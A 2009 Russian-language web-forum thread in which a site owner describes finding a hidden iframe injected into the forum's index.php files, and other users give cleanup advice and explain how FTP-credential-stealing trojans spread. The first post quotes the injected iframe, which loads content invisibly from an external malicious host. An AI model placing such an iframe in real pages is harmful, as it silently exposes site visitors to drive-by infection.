ExBB Community :: Версия для печати :: Форум атакован вирусом типа HTML:Iframe-inf

1. i-text - 21 августа 2009 — 12:05 - перейти к сообщению

Сегодня утром захожу на свой форум... И вижу белое окно браузера.

В недоумении заглядываю на фтп и слышу голос аваста: "Внимание обнаружен вирус!". Смотрю на список файлов и действительно файл "index.php" недавно был модифицирован, открываю его в редакторе и вижу последняя часть его кода варварски удалена (с 281 по 296 строку), а за место нее стоит ненавистный iframe тег, такого типа:

CODE:

iframe src="http://f5l.at:8080/ts/in.cgi?pepsi154" width=125 height=125 style="visibility: hidden"></iframe>

. Удалил. А потом обнаружил, что это содержание внедрено практически во все "индекс" файлы форума. Пришлось чистить.

Кто может подсказать как бороться с такими атаками? Как их предотвратить? И как они вообще возможны? Как был получен доступ на запись к индекс файлам?

2. RomAndry - 21 августа 2009 — 12:20 - перейти к сообщению

1. не читать подозрительные письма!
2. не ходить по подозрительным ссылкам!
3. почистить комп от вирусов
4. почистить измененные файлы (смотреть по дате модификации)
5. сменить пароли на ФТП и Базу
6. стараться не использовать total Comander
7. повторять пункт 1 и 2 до просветвления Язычок

3. i-text - 21 августа 2009 — 13:30 - перейти к сообщению

RomAndry Спасибо. Радость

Но я это все проделал.
Мне стал интересен механизм доступа к файлам на фтп. Какими путями это делается?
Т.е. как я понял, после проникновения на компьютер, вирус ворует пароли из фтп клиента (у меня файлзилла) и ... что происходит дальше? Он куда-то отсылает полученные данные?

4. Borman - 21 августа 2009 — 14:23 - перейти к сообщению

RomAndry +1 И желательно иметь файрвол типа OutPost и хорошенько его настроить, или антивирь типа Esset Smart Security с файрволом.

И ребята мой вам совет не шартесь по порно сайтам, это рассадник вирусов и троянов, убедился на собственном опыте. После их посещения Каспер не успевал ДОС-атаки отбивать.

5. Victor - 21 августа 2009 — 19:15 - перейти к сообщению

RomAndry +1
вирус атаковал фтп через ТоталКомандер (он имеет такую уязвимость)..одно хорошо заразив файлы он больше не возвращается на тот же ресурс...
чистить комп от вирусов и обновлять базу антивира.. в общем то тотал после этого меня не подводил.. крайний вариант тех.поддержка хостинга тоже может помочь...

6. RomAndry - 21 августа 2009 — 19:57 - перейти к сообщению

i-text пишет:

Т.е. как я понял, после проникновения на компьютер, вирус ворует пароли из фтп клиента (у меня файлзилла) и ... что происходит дальше? Он куда-то отсылает полученные данные?

да, различные модификации есть этого вида трояна, в кратце скажу так
заходят на аккаунты, которые были на ФТП, модифицируют файлы, далее посетители заходят на страничку с вирусом и заражаются и точно так же далее происходит по принципу цепной реакции. Есть модификации, которые потом используют зараженные компьютеры для DDOS атак